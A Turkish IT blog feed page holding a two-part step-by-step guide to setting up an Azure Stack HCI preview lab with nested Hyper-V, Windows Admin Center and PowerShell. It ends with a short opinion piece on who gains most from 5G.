Quantcast
Channel: ÇözümPark
Viewing all 4130 articles
Browse latest View live

Yeni Azure Stack HCI nedir? Preview kurulumu ve konfigürasyonu nasıl yapılır? – Bölüm 1

$
0
0

Azure Stack HCI, 1 seneyi aşkın bir süredir piyasada olan bir kavram, fakat tam olarak neyi ifade ettiği konusunda genel bir belirsizlik var. İçerisinde Azure ifadesi geçtiği için doğal olarak bir bulut bağı var diyoruz, ama aslında isterseniz hiçbir Azure hizmetine bağlamak zorunda değilsiniz. Azure, Azure Stack ve Azure Stack HCI kavramlarını kısaca açıklayarak işe başlayalım:

Azure, çoğumuzun bildiği üzere bir umuma açık (public), hibrit bir bulut platformudur. Umuma açık ile kastedilen isteyen her bir bireyin veya kurumun doğrudan bir web portala girip, herhangi bir insan müdahalesi olmadan kendi IT kaynaklarını veya altyapısını oluşturmasına imkân vermesidir. Bir ön kayıt veya özel erişim gerekli değildir. Azure portala girersiniz, kaynaklarınızı oluşturursunuz ve işinize başlarsınız.

Azure Stack, Azure’un sunduğu hizmetlerin bir kısmını kendi veri merkezlerinde, kendi donanımınız üzerinde çalıştırmanıza izin veren bir hibrit bulut platform çözümüdür. Hyper converged bir yapıdır; yani Software Defined Storage ve Network mimarisi üzerine kurulmuştur. Hizmetlerinizi aynı Azure’daki web portala benzer bir portal üzerinden yönetirsiniz; tek farkı bu portalın sadece size ait olmasıdır. Umuma açık değildir. Aslında Azure’un platform ve altyapı servislerinin sizin donanımınız üzerine kurulmuş minyatür bir versiyonudur. Sizin tarafınızdan yönetilir ve tüm verileriniz, siz buluta replike etmeyi veya yedeklemeyi tercih etmediğiniz sürece size ait cihazlar üzerinde tutulur. Lisanslamasını yapmak dışında Azure ile zaruri bir bağlantısı yoktur diyebiliriz. Lisans ücreti, kullandığınız kaynaklara atadığınız vCPU ve depolama alanı üzerinden (TB başına) Azure aboneliğinize yansıtılır. Donanımı alırken piyasadaki üreticilerin Azure Stack sertifikalı, donanımlarını alırsınız. Bu donanımlar üzerinde sadece Azure Stack işletim sisteminin çalışacağı özel donanımlar değildir; sadece Microsoft tarafından Azure Stack’in tam uyumlu şekilde çalışacağına dair sertifikalandırılmışlardır. Yarın bir gün Azure Stack kullanmak istemediğiniz takdirde bu donanımları formatlayıp üzerine istediğiniz sistemi kurabilirsiniz.

Azure Stack HCI, sizin donanımızın üzerine konumlandırılacak, Windows Server 2016/2019’un Core sürümünü baz alınan hyper converged sanallaştırma altyapısı ve bu yapının uzaktan yönetimini sağlayan Windows Admin Center’dan oluşur. Aslında yeterli miktarda Windows Server lisansına sahipseniz oturup kurabileceğiniz, storage ve network’ü sanallaştırılmış bir yapıdır. Yine buradaki önemli fark alacağınız donanımın Azure Stack HCI kataloğunda bulunması gerekliliğidir. Bu katalog sayesinde donanım uyumluluğu hedeflenmiştir. Kısacası sertifikalandırılmış donanım üzerine kurulan Windows Server tabanlı hyper converged yapıdır. Azure Stack HCI, Windows Admin Center üzerinden yönetildiğinde Azure Site Recovery, Storage Replica veya Azure Monitor gibi bulut servisleriyle entegre olma imkânı sunar. Eğer Azure servislerine bağlamazsanız, Windows Server lisansı dışında bir ücret ödemezsiniz.

Yeni Azure Stack HCI diye bahsedilen ve geçtiğimiz Microsoft Inspire 2020 etkinliğinde duyurulan ürün, Azure entregrasyonunu daha ileriye götürmeyi hedefliyor. Öncelikle host makinelere Windows Server 2016/2019 kurmak yerine Azure Stack HCI adında yeni bir işletim sistemi kurulmasını şart koşar. Bu işletim sistemi Windows Server 2016/2019’un aksine LTSC dağıtım kanalında değildir; yani yıllık update’ler alır. Şu an kullandığımız Server 2019’dan daha güncel bir kod tabanına sahiptir. İçerisinde Azure Arc servisi ile entegre olmasını sağlayacak gerekli kütüphaneler vardır ve Core sürümü baz almaktadır. Lisanslama modeli ise ortamınızdaki host’lardaki fiziksel çekirdek adedine göredir. Yapıyı Azure’a kaydettirdiğinizde bu miktar hesaplanır ve Azure üyeliğiniz üzerinden ücretlendirilirsiniz.

Bahsi geçen özelleştirmeler sonucu bu HCI yapısını aşina olduğumuz Azure portal üzerinden yönetmek, sanal makine oluşturmak ve RBAC ile Azure AD’de bulunan objelere bu kaynaklar üzerinde yetki vermek mümkün olacaktır. Makaleyi yazdığım tarih itibariyle bu özellikler Azure tarafına henüz gelmemiştir. İlerleyen zamanlarda bu özellikler eklenince makale serime ekleme yaparak bu entegrasyonu da anlatacağım.

Görebileceğiniz üzere Azure Stack HCI’ın bu son revizyonu çok yeni ve gelişime müsait. Etkinlikten edindiğim bilgilere göre şu anki Azure Stack HCI’dan yeni versiyona bir migrasyon yolu da ayrıca duyurulacak. Sonuç itibariyle yapılar çok da farklı değil, en kötü ihtimalle Cluster OS Rolling Upgrade ile bu sürüme geçiş yapmanın mümkün olacağını düşünüyorum.

İşe başlamadan önce aşağıdaki linkten kaydolup yeni Azure Stack HCI Preview’in ISO’unu indirelim:

https://azure.microsoft.com/tr-tr/products/azure-stack/hci/hci-download

Ortamımız bir adet DC, client makine (tercihen Windows 10) ve minimum 2 adet Azure Stack HCI işletim sistemi kurulu sanallaştırma host’undan oluşacak. Yapımızı Azure’da açtığım bir sanal makinede ayaklandıracağız fakat anlatacaklarımı kendi Windows makinenize HyperV rolü kurarak da uygulayabilirsiniz. Anlatımımı yaparken buna da atıfta bulunacağım. VMware Workstation veya Virtualbox gibi 3. parti çözümleri kullanamıyoruz çünkü Microsoft, HyperV rolünün sanal makine içerisinde bir kez daha etkinleştirmeyi bu platformlarda desteklemiyor.

Azure’daki sanal makinelerde, aynı Windows Server 2016/2019’da olduğu gibi nested virtualization (iç içe sanallaştırma) mümkün fakat bunu destekleyen bir makine tipi kullanmanız gerekiyor. Desteklenen makine tiplerini aşağıdaki linkten bulabilirsiniz:

https://azure.microsoft.com/en-us/blog/introducing-the-new-dv3-and-ev3-vm-sizes

İşletim sistemi olarak Windows Server 2019 kullanacağız fakat isterseniz Server 2016’da kullanabilirsiniz. Daha eski sürümlerde nested virtualization desteği yok.

Bu makine aynı zamanda sanallaştırma hostumuz da olacağı için RAM miktarını 32 GB’ın altında seçmemenizi tavsiye ederim. Eğer kendi cihazınızda test edecekseniz SSD’li bir makine ve minimum 16GB RAM gerekiyor. Fakat önerim, 32GB RAM ve SSD ile bu ortamı kurmanız yönünde olacaktır. Ayrıca yapıyı Azure’da kuracaksanız sanallaştırma host’unuza işletim sistemi diski dışında 1 adet SSD datadisk de eklemenizi ve sanal makine dosyalarını buna konumlandırmanızı tavsiye ederim.

Sanallaştırma hostu üzerinde bir adet DC, bir adet client ve minimum iki adet Azure Stack HCI node’u kuracağız. DC’yi Windows Server 2019 üzerinde konumlandıracağız ve client makine olarak Windows 10 sürüm 2004’ü kullanacağız.

Temel ADDS, Failover Clustering ve HyperV bilginizin olduğunu varsayarak anlatacağım. Eğer bu konular hakkında yeterli bilginiz yoksa Çözümpark’ta aratıp detaylı bilgiye ulaşabilirsiniz.

Ben Azure’da D16ds_v4 tipinde 16 çekirdekli ve 64GB RAM’li bir makine açtım ve bir adet SSD tipinde datadisk’i ekledim.

Bu makineyi HyperV hostumuz olarak kullanacağız. Eğer fiziksel makinenize kuruyorsanız o da sizin HyperV host’unuz oluyor. Makineye HypverV rolünü kurmak için yönetici haklarıyla çalıştırdığınız bir powershell oturumunda aşağıdaki komutu çalıştıralım:

Install-WindowsFeature -Name Hyper-V -IncludeManagementTools -Restart

Komutun çalıştırılması bittiğinde makine otomatikman kendini yeniden başlatacaktır.

Yeniden başlatma işlemi bittikten sonra özellikle client makinede çalışmayı kolaylaştırması açısından host’umuzda Enhanced Session özelliğini aşağıdaki komutla aktif hale getirelim:

Set-VMhost -EnableEnhancedSessionMode $True

Artık vSwitch (virtual switch) oluşturma aşamasına geçebiliriz.

HyperV host’unuz ister kendi cihazınız ister Azure’da bir sanal makine olsun vSwitch olarak External türünü kullanmak yerine Server 2016 ve sonrasında desteklenen vNAT destekli Internal vSwitch kullanacağız. Böylece fiziksel networkünüzü doğrudan sanal makinenize açmamış olacağız.

Öncelikle Internal tipinde vSwitch oluşturalım. Bunun için aşağıdaki powershell komutunu girelim:

New-VMSwitch -Name “InternalNAT” -SwitchType Internal

Bu komutu çalıştırdıktan sonra InternalNAT isminde bir sanal switch oluşacak. İşimiz burada bitmiyor. Zira bu switch’i dış dünyayla haberleştirmek için NAT gateway ve NAT network ayarlamamız gerekiyor. Sırasıyla şu komutları çalıştıralım:

New-NetIPAddress -IPAddress 192.168.0.1 -PrefixLength 24 -InterfaceAlias “vEthernet (InternalNAT)”

New-NetNat -Name “AzSHCINAT” -InternalIPInterfaceAddressPrefix 192.168.0.0/24

İlk komutla gateway IP adresimizi (istediğiniz iç IP blokunu kullanabilirsiniz), ikinci komutta da NAT networkünün IP subnetini belirledik. Artık sanal makineleri açarken network adımında bu oluşturduğumuz vSwitch’i seçeceğiz. Makinelere statik IP vermek için bu subnet aralığını kullanacağız ve gateway söz konusu olduğunda da 192.168.0.1 adresini yazacağız.

Sanal makinelerimiz kurmaya başlayabiliriz. Öncelikle ortamın kimlik doğrulama yöneticisi olacak olan AD Domain Controller’ı kurmakla başlayalım.

Makine ismi: AZSHCIDC

IP: 192.168.0.2

vCPU: 2

RAM: 2048 (Dynamic Memory aktif)

Makinenin kurulumu bittikten sonra ismini verip AD DS rolünü makineye kurduktan sonra makinemizi Domain Controller rolüne terfi ettiriyoruz. Bu işlem bittikten sonra domainde “labadmin” isminde bir kullanıcı açıp bu kullanıcıyı Domain Admins, Enterprise Admins ve Schema Admins gruplarına dahil edelim. Bütün kurulumlarda ve bağlantılarda bu kullanıcıyı kullanacağız. Bu işlemden sonra Client makinemizi kurmaya başlayabiliriz.

Makine ismi: CLIENT

IP:  192.168.0.3

vCPU: 4

RAM: 4096 (Dynamic Memory aktif)

Windows 10 kurulumu bittikten sonra DNS ayarlarını yapıp bir önceki adımda oluşturduğumuz domaine dahil edelim. Domaine dahil etme işi bittikten sonra “labadmin” kullanıcısı ile bu makinede oturum açalım. Uzaktan yönetim için gerekli Windows Admin Center’ı indirelim ve kuralım:

https://www.microsoft.com/en-us/windows-server/windows-admin-center

Windows Admin Center’ın 2007 sürümünden önceki bir sürüm kullanmayın, zira eski sürümleri Azure Stack HCI konfigürasyonunu desteklenmiyor.

Artık Azure Stack HCI node’larını kurmaya geçebiliriz. Demo ortamımızda 2 adet node kullanacağız ve bunlara aşağıdaki konfigürasyonda açacağız:

Node 1 ismi: AZSHCIN1

IP: 192.168.0.4

vCPU: 4

RAM: 4096 (Dynamic memory pasif)

Node 2 ismi: AZSHCIN2

IP: 192.168.0.5

vCPU: 4

RAM: 4096 (Dynamic memory pasif)

Bu makineler içerisinde bir kez daha HyperV rolünü etkinleştireceğimiz için Dynamic Mermory özelliğinin kapalı olması şartı var. Bu durum, nested virtualization kullanarak sanal makine içinde sanal makine kurmaya yönelik tüm senaryolarda geçerli olan istisnai bir durum.

Sanal makine oluşturma adımında “Installation Options” adımında indirdiğimiz Azure Stack HCI ISO’sunu gösterelim:

İkinci host’u da aynı şekilde açtıktan sonra host’ların vCPU, network adaptörü ve disk ayarlarını yapmak için sanal makine özelliklerine girelim. Her iki host’ta 3’er tane network adaptörü ve 4 tane sanal disk ekleyeceğiz. Sanal makineler oluşturulurken 1 tane network adaptörü oluşturuluyor. Diğer 3’ünü oluşturalım ve aynı vSwitch’e bağlayalım.

Açacağımız diğer üç network adaptöründe aşağıda ek özellikleri aktif hale getirelim:

Sonrasında sanal makinemize 127 GB boyutunda 4 adet dinamik sanal disk ekleyelim:

Bu diskler konfigürasyon aşamasında hyper converged yapımızdaki Storage Space Direct havuzuna dahil edilecek ve CSV (Cluster Shared Volume) olacak.

Aynı işlemleri ikinci node olarak kullanacağımız sanal makinede de yapalım.

Makineleri açmadan önce son olarak işlemcimizdeki sanallaştırma özelliğini sanal makinelerine açmamız lazım ki iç içe sanallaştırma yapabilelim. HyperV host’unda bu iki sanal makine için nested virtualization’ı aktif hale getirelim:

Set-VMProcessor -VMName sanal_makine_ismi -ExposeVirtualizationExtensions $true -Verbose

Bu işlemler bittikten sonra Azure Stack HCI sanal makinelerini başlatıp kuruluma geçebiliriz. Kurulumun standart bir Windows Server 2019 Core kurulumundan bir farkı yok. Tek dikkat etmeniz gereken nokta kurulumu “English (United States)” bölgesel ayarı seçili olarak yapmanız. Şu anki Preview’de bulunan bir bug’dan ötürü bu bölgesel ayar dışındaki kurulumlarda Azure Stack HCI konfigürasyon aşamasında ilerlemenizi engelleyen bir hata ile karşılaşıyorsunuz. “English (United Kingdom)” ayarıyla bile aynı hataya düşen ve ilerleyemeyen kullanıcılar var. Bu yüzden baştan önlemimizi alalım. Klavye düzeninizi TRQ veya TRF seçebilirsiniz. Kurulum bitip lokal admin şifrenizi belirledikten sonra Core sürümün temel konfigürasyon script’i olan sconfig açılacaktır.

8 numarayı seçip network ayarlarımızı yapalım. Index numarası 1 olan network adaptörümüz management için kullanacağız. Dolayısıyla buna şimdi yukarda belirlediğimiz IP, subnet ve DNS (Domain Controller IP adresi) ayarlarını vereceğiz.

Network iletişimi tamamsa ana menüye dönüp öncelikle 2 sonrasında 1 seçeneğini kullanarak makine ismini belirleme ve domaine dahil etme işlemlerini yapalım.

Artık Azure Stack HCI host’larının lokalinden yapılması gereken tüm işlemler bitmiş durumda. Normalde bundan sonraki işlemlerimizi client makinemizde Windows Admin Center veya powershell üzerinden yapabiliriz fakat Azure HCI’ın bu preview sürümündeki başka bir bug sebebiyle Windows Admin Center üzerinden Azure Stack HCI hostlarında HyperV özelliğini etkinleştirirken bir hata çıkıyor ve HyperV kurulamıyor. Keza makineye lokalden bağlanıp powershell üzerinden kurmaya çalıştığınızda da aynı durum oluyor. Microsoft bu durum için geçici bir workaround yayınladı. “Invoke-Command” komutunu HyperV hostumuz üzerinde bu 2 HCI host’u için çalıştırarak HyperV özelliğini aktif hale getireceğiz. Aşağıdaki powershell script’ini Azure Stack HCI sanal makinelerini ayaklandırdığımız HyperV host’unda çalıştıralım.

$domainName = “domain_ismi

$domainAdmin = “$domainName\yetkili_kullanıcı

$domainCreds = Get-Credential -UserName “$domainAdmin” -Message “Enter the password for the LabAdmin account”

$nodeName = “hci_node_ismi”

Invoke-Command -VMName “$nodeName” -Credential $domainCreds -ScriptBlock {

    # Enable the Hyper-V role within the Azure Stack HCI OS

    Enable-WindowsOptionalFeature -Online -FeatureName Microsoft-Hyper-V -All -NoRestart -Verbose

}

Write-Verbose “Rebooting node for changes to take effect” -Verbose

Stop-VM -Name $nodeName

Start-VM -Name $nodeName

while ((Invoke-Command -VMName $nodeName -Credential $domainCreds {“Test”} -ErrorAction SilentlyContinue) -ne “Test”) {

    Start-Sleep -Seconds 5

}

Write-Verbose “$nodeName is now online. Proceeding to install Hyper-V PowerShell….” -Verbose

Invoke-Command -VMName “$nodeName” -Credential $domainCreds -ScriptBlock {

    # Enable the Hyper-V PowerShell within the Azure Stack HCI OS

    Enable-WindowsOptionalFeature -Online -FeatureName Microsoft-Hyper-V-Management-PowerShell -All -NoRestart -Verbose

}

Write-Verbose “Rebooting node for changes to take effect” -Verbose

Stop-VM -Name $nodeName

Start-VM -Name $nodeName

while ((Invoke-Command -VMName $nodeName -Credential $domainCreds {“Test”} -ErrorAction SilentlyContinue) -ne “Test”) {

    Start-Sleep -Seconds 1

}

Write-Verbose “$nodeName is now online. Proceed to the next step….” -Verbose

İtalik yazdığım değişkenleri kendi ortamınızdaki değerlere göre düzenlemeyi unutmayın.

HyperV’yi de etkinleştirdiğimize göre artık client makinede kurulu Windows Admin Center üzerinden Azure Stack HCI konfigürasyonuna geçebiliriz. Makalemizin ikinci bölümünde görüşmek üzere.

The post Yeni Azure Stack HCI nedir? Preview kurulumu ve konfigürasyonu nasıl yapılır? – Bölüm 1 appeared first on ÇözümPark.


Yeni Azure Stack HCI nedir? Preview kurulumu ve konfigürasyonu nasıl yapılır? – Bölüm 2

$
0
0

Serinin ilk bölümüne buradan ulaşabilirsiniz.

Makalemizin bu bölümünde Windows Admin Center üzerinden Azure Stack HCI konfigürasyonunu ve sonrasında powershell üzerinden Azure’a register etme işlemlerini deneyimleyeceğiz. Eğer ilk bölümü okumadıysanız öncelikle ona göz atmanızı tavsiye ediyorum.

Windows Admin Center’ı açalım ve “Add” butonuna basalım.

Sonrasında Server Clusters altından “Create new” diyelim.

“Cluster type” adımında “Azure Stack HCI” seçelim.

Bundan sonraki aşamada öncelikle sunucuların ön gereksinimleri karşılayıp karşılamadığı kontrol edilecektir. “Next” ile ilerleyelim.

Bu adımda sunucularda ve AD’de gerekli yetkiye sahip kullanıcıyı belirtelim. Bizim ortamımızda bu yetkileri “labadmin” isimli AD kullanıcısına vermiştik. Sonrasında HCI node’larının isim veya IP’lerini yazarak “Add” butonuna basalım.

Sonraki adıma sunucuları domain’e dahil etmeye çalışacak. Biz zaten bu adımı yaptığımız için direkt Next’e basabiliriz.

“Install Features” adımında Azure Stack HCI Cluster’ımız için gerekli özellikler kurulacak. Gördüğünüz gibi HyperV kurulu gözüküyor. Önceden kurmamış olsaydık bu adımda hata ile karşılaşacaktık.

“Install updates” ve “Solution updates” adımlarını da takip ederek ilerleyelim.

Bu işlemler bittikten sonra “Restart servers” adımında sunucular yeniden başlatılacaktır. Bu işlemden sonra Hyper Converged yapının konfigürasyon işlemleri başlayacaktır.

İlk etapta network ayarlarını yapmamız istenecek. Makinelere eklediğimiz 4 ethernet kartının ilkini Management için seçelim. Zaten bu karta her iki node’da IP verdiğimiz için bunlar seçilebilir durumda. İstersek yedeklilik için 2 adet kartı “nic teaming” yapıp birleştirerek kullanabiliriz fakat demo ortamımız için tek kart seçiyoruz ve “Apply&Test” butonuna tıklıyoruz.

Sonraki adım önemli çünkü burada hangi kartı Storage trafiği, hangi kartı VM trafiği için kullanacağımızı seçeceğiz. IP yapılandırmasını network topolojinize göre belirleyebilirsiniz. Ben demoda VM trafiği için 1 adet, storage trafiği için 2 adet kart seçeceğim. IP konfigürasyonumu şekilde görebilirsiniz.

Virtual switch oluşturma aşamasına geldiğimizde 3 seçeneğimiz var:

  1. Sanal makine trafiği ve depolama trafiği için tek bir vSwitch oluşturma
  2. Sadece sanal makine trafiği için vSwitch oluşturma
  3. Sanal makine ve depolama trafiği için iki ayrı virtual switch oluşturma.

Bu adımı atlayıp sonra da oluşturmanız mümkün. Sadece sanal makine için virtual switch oluşturup 3 ethernet kartından en üsttekini seçmemiz yeterli. Ben sanal makine ve storage için iki ayrı switch oluşturup bir kartı sanal makine switch’i, diğer iki kartı da depolama switch’i için kullanmayı tercih ettim.

Sonraki aşamada Cluster oluşturulacak, fakat öncesinde ortamın cluster olmaya uygun olup olmadığını doğrulama için teste tabi tutulacak. “Validate cluster” deyip devam edelim. Makalenin başında bahsettiğim “English (United States)” bölge ayarıyla kurma, burada işe yarayacak. Şayet farklı bir ayar seçmiş olsaydık doğrulama bittiğinde hata alacaktık ve ilerlememize izin verilmeyecekti.

“Create cluster” aşamasında Failover cluster’ımıza bir isim veriyoruz ve “Advanced” seçeneğini seçip statik bir IP veriyoruz. Ben 192.168.0.10 IP’sini kullandım. “Use all networks” seçeneğini olduğu gibi bırakabilirsiniz.

Cluster oluşturma işlemi bittikten sonra S2D (Storage Space Direct) özelliğinin aktif hale getirilme sürecine geliyoruz. “Clean drives” deyip disklerdeki olası verileri temizleyelim.

Sonraki aşamada disklerin S2D için uygun olup olmadığı denetlenecek.

Son olarak S2D aktif hale getirelim ve böylece konfigürasyonu bitirelim.

Gerçek sunucular ve fiziksel disklerle bu işi yapıyor olsaydık Tiering işlemi de bu adımda yapılacaktı. Mesela konfigürasyonunuz SSD ve mekanik disklerden oluşuyor olsaydı SSD’ler doğrudan ön bellek olarak kullanılacak, depolama alanına sadece mekanik diskler dahil edilecekti.

Şayet SATA SSD, NVME SSD ve mekanik disklerden oluşan bir yapımız olsaydı S2D bu sefer NVME SSD’leri önbellek yapıp, kapasite ve performans türünde iki adet depolama havuzu oluşturacaktı. SATA SSD’ler performans havuzuna, mekanik diskler de kapasite havuzuna dahil edilecekti.

Tamamen katı hal depolamadan oluşan bir yapımız olsaydı yine SSD’lerin türüne göre önbellek, kapasite ve performans türlerinden oluşan bir depolama havuzu oluşacaktı.

S2D’nin tiering mantığını anlatmak adına araya böyle bir açıklama ekledim. Bu konu node sayısı ve performans beklentisine göre çok fazla varyasyona sahip olabilir.

Bu ekranı gördüğümüzde süreci başarıyla bitirdik demektir.

Konfigürasyon bittikten sonra Windows Admin Center ana ekranına geliyoruz. Burada cluster node’larını ve cluster ismini listede görüyoruz. Cluster ismine tıklayıp içerisine girelim.

Gördüğünüz gibi cluster sağlık durumu iyi.

Artık cluster hazır olduğuna göre üzerinde sanal makine açmadan önce yapmamız gereken bir adım kaldı: Disk yedeklilik türünü belirlemek ve Clustered Shared Volume’u oluşturmak. Bunun için soldaki menüde “Storage” altından “Volumes” a girelim. Sonrasında Inventory sekmesine geçelim.

Gördüğünüz üzere bir adet 20GB’lık volume halihazırda oluşturulmuş. Bu volume, S2D tabanlı depolama havuzumuzun performans geçmişine dair bilgileri barındıran ve kurulum sırasında otomatikman oluşturulan bir alan. Biz yeni bir tane oluşturmak için “Create” butonuna basıyoruz.

Bastığımızda oluşturacağımız alanın yedeklilik tipini ve boyutunu belirlememiz isteniyor. Toplam 2 HCI node’u ve her node’da 4’er adet disk olduğu için yedeklilik türü olarak sadece “Two-way mirror” çıkıyor. Buna klasik RAID mantığında RAID1 diyebiliriz. İstediğiniz alanı yazdığınızda bunun fiziksel olarak diskte kaplayacağı alanı da size bildiriyor. Veri tekilleştirme (de-duplication) ve sıkıştırma (compression) opsiyonunu seçip, veri tipinde HyperV’yi seçelim. Bu iki seçenek sayesinde diske konumlandıracağımız sanal makinelerden büyük oranlarda yer kazanacağız.

Volume da hazır olduğuna göre artık sanal makine oluşturabiliriz. Soldaki menüden “Compute” başlığı altındaki “Virtual machines” sekmesine tıklayalım. “Summary” sayfasında toplam CPU/RAM kullanımı, sanal makinelerin durumu ve disk I/O bilgilerini görüyoruz.

Inverntory sekmesine geçip sanal makinemizi oluşturalım.

Hatırlasanız depolama ve VM trafiği için iki ayrı virtual switch oluşturmuştuk. Sanal makinemiz için ComputeSwitch’i seçelim.

Makinemiz oluşturuldu.

Makinemizi seçip Start butonuna bastıktan sonra “More” butonu altından “Download RDP file” deyip makinemize bağlanalım.

Gördüğünüz gibi makinemiz başlamış fakat ön yükleme yapabilecek bir kaynak bulamadığı için hata vermiş. İstersek bir işletim sistemi ISO’su takarak yükleme yapabiliriz.

Madem cluster yaptık, o zaman sanal makinemizi bir host’tan diğerine Live Migration ile taşıyalım. Bunun için makineyi seçip “Move” butonundan farklı bir host’a taşıyalım.

Azure Stack HCI yapımızı böylece ayaklandırmış olduk. Son olarak bu yapıyı Azure’a register etmemiz gerekiyor. Kurulumdan sonra 30 gün içerisinde bu işlemin yapılması gerekiyor. Preview süresince Azure’a kaydettirme ve Azure’a has özelliklerin kullanımı ücretsiz. Register işlemi için bir adet Azure hesabınızın olması gerekiyor. İşlemleri client makinemizde yönetici haklarıyla çalıştırdığımız powershell üzerinden yapacağız.

Öncelikle HCI node’larımıza gerekli powershell komut setlerini uzaktan yükleyelim:

$nodes = “node_ismi1″,”node_ismi2”,…”node_ismi_n”

Invoke-Command -ComputerName $nodes -ScriptBlock {

    Install-WindowsFeature RSAT-Azure-Stack-HCI

}

Sonrasında aynı komut setlerini client makinemize kuralım:

Set-ExecutionPolicy -ExecutionPolicy RemoteSigned -Force

Install-Module Az.StackHCI

Şimdi aşağıdaki komut ile mevcut register durumunu kontrol edelim:

Invoke-Command -ComputerName node_ismi -ScriptBlock {

    Get-AzureStackHCI

}

Bu işlemi herhangi bir node ismini kullanarak yapabiliriz. Gördüğünüz gibi henüz registered değiliz.

Sonrasında Azure portala girip üyeliğimize ait Subscripton ID’yi öğrenelim. Bunun için Azure panelinden Subscriptions altına girebilir veya açtığımız herhangi bir kaynağın içine girip Overview menüsünden öğrenebiliriz.

Sonrasında aşağıdaki komutları çalıştırıp register işlemine başlayabiliriz.

-ResourceName: bu kaynağa vereceğimiz adı

-ResourceGroup: kaynağın bağlanacağı gruba vereceğimiz adı

-Region: kaynakların coğrafi konumunu

-EnvironmentName: Azure ortamını

-ComputerName: register edeceğimiz node’un adını

-Credential da cluster’ı yönetmeye yetkili kullanıcı bilgilerini temsil ediyor.

Biz kendi örneğimizde Region parametresini kullanmayacağız. Şu an register işlemi sadece EastUS bölgesinde destekleniyor ve parametre belirtilmediği takdirde otomatikman bu bölge seçiliyor. İlerleyen zamanlarda farklı bölgelerde de bu özellik açılacak.

$azshciNodeCreds = Get-Credential -UserName “domain_ismi\yetkili_kullanıcı” -Message “Enter the Lab Admin password”

Register-AzStackHCI  `

    -SubscriptionId “üyelik_numaranız” `

    -ResourceName “kaynak _ismi” `

    -ResourceGroupName “kaynak_grubu_ismi” `

    -EnvironmentName “AzureCloud” `

    -ComputerName “node_ismi” `

    –Credential $azshciNodeCreds

Komut çalıştırdıktan sonra öncelikle cluster’da yetkili domain kullanıcı bilgileri istenecek, sonra da Azure’da yetkili kullanıcı ile giriş yapılması istenecek. Yönergeleri takip edelim.

Başıma gelen ufak bir durumu da paylaşayım. İlk denememde Azure Stack HCI henüz EastUS bölgesinde desteklenmiyor şeklinde bir hata aldım:

Fakat ikinci kez aynı komutları çalıştırdığımda süreci başarıyla tamamladı. Bu kurulumu toplam 2 kez yaptım ve her ikisinde de aynı durumla karşılaştım. Preview süreciyle ilgili olduğunu düşünüyorum.

Son olarak register durumunu tekrar kontrol edelim:

Azure paneline girip açılan kaynak grubunu ve kaynağı görebiliriz. “All Services” altından Azure Stack HCI” diye arattığımızda Cluster’a verdiğimiz isimle açılan bir kaynak göreceğiz:

Gördüğünüz gibi henüz tüm özellikler kullanılabilir durumda değil. Yakında gelecek ibaresi var.

Böylece makale serimizin sonuna gelmiş oluyoruz. Bir sonraki makalemde bu Stack’i Azure Monitor ve OMS gibi Azure hizmetlerine bağlamayı anlatacağım. Eğer makalenin başında bahsettiğim ve yeni Azure Stack HCI’ı farklı kılacak olan Azure portal üzerinden yönetme/yetkilendirme özellikleri de duyurulur ve test edilebilir hale gelirse bununla ilgili de bir makale hazırlamayı planlıyorum.

Bir sonraki yazıda görüşmek üzere.

Kaynaklar:

https://github.com/Azure/AzureStackHCI-EvalGuide/blob/main/nested/README.md

https://github.com/Azure/AzureStackHCI-EvalGuide/blob/main/nested/steps/3a_AzSHCINodesGUI.md

https://github.com/Azure/AzureStackHCI-EvalGuide/blob/main/nested/steps/4_AzSHCICluster.md

https://github.com/Azure/AzureStackHCI-EvalGuide/blob/main/nested/steps/4_AzSHCICluster.md#troubleshooting-cluster-validation-issues

https://github.com/Azure/AzureStackHCI-EvalGuide/blob/main/nested/steps/5_ExploreAzSHCI.md

The post Yeni Azure Stack HCI nedir? Preview kurulumu ve konfigürasyonu nasıl yapılır? – Bölüm 2 appeared first on ÇözümPark.

5G’den En Fazla Kim Faydalanacak?

$
0
0

Artık 5G teknolojisi ufukta, 5G ile ilgili cevabı merak edilen iki soru ise şöyle; bulut bilişimin ipleri eline alması ne kadar sürecek ve bundan en çok kim yararlanacak?

5G hücresel teknolojinin büyümesi, bulut bilişim için daha büyük bir pazar sağlamak ve daha önemlisi hem bağlantıyı hem de güvenliği basitleştirmek için 5G teknolojisinin potansiyel sağlayıcıları başta olmak üzere birçok insanı heyecanlandırdı.

Bu aşamadaki önemli sorulardan biri de şu: En çok kim kazanacak? 5G kullanan işletmeler? Bulut bilişim sağlayıcıları? 5G satan telekomünikasyon şirketleri?

5G, işletmelere bazı önemli sorunların çözümünü sunuyor.

İlk olarak, bağlantıyı stabil hale getiriyor. Dünya nüfusunun çok büyük bir kısmı seyahat ederken, taşınabilir erişim noktalarında, otel, havaalanı, kahve dükkanı Wi-Fi noktalarında vb. Dahil olmak üzere çeşitli bağlantı yöntemleri kullanıyor. Ancak bu yöntemler insanlara nadiren tutarlı ve iyi hızlar sunabiliyor. 5G teknolojisi ise bize, evde, yolda, otelde aynı yöntem ve ağı kullanarak sürekli yüksek hızlar sağlayacağını vaat ediyor.

5G ile internet bağlantımızda gelişeceği söylenen ikinci önemli şey ise güvenlik. Genel ağları kullanmak, güvenlik risklerinin 100 kat artması anlamına geliyor. Ancak 5G’yi tutarlı bir şekilde kullanmak, bilinen bir ağda her zaman aynı güvenlik sistemini kullandığınızı düşünürsek, güvenliği de sürekli olarak yüksek tutacaktır.

Bulut sağlayıcıları için, 5G’nin yatırım getirisinin formülü oldukça basit. Bağlantı ne kadar iyi olursa, o kadar çok para demek. Şu anda, geniş bant dünyanın her yerinde bulunmuyor ve 5G, ev ve mobil kullanımını birbirine yaklaştır, internet hızları sabitlenirse, bulut bilişim kullanımı da 5G’nin benimsenmesine paralel olarak artacaktır.

Daha da önemlisi, bulut bilişim tabanlı uygulamaların (yayın servisleri vs) kullanımı, pazarın henüz sömürülmemiş büyük bir bölümünü oluşturacaktır. Yaygın yüksek hızlı seçeneklerin eksikliği, bu tarz uygulamaların dünyanın her yerindeki kullanıcılara hitap edememesinin sebeplerinden biri.

Son olarak telekomünikasyon dünyası, 5G’nin sağlayacağı yeni pazardan fazlasıyla yararlanacak. Haneler ve işletmeler, tüm bağlantı türleri için tek bir 5G sağlayıcısı seçecek. Kablo ve DSL modemler, bir yıldır kullandığınız ISDN modem ile aynı rafa konulabilir.

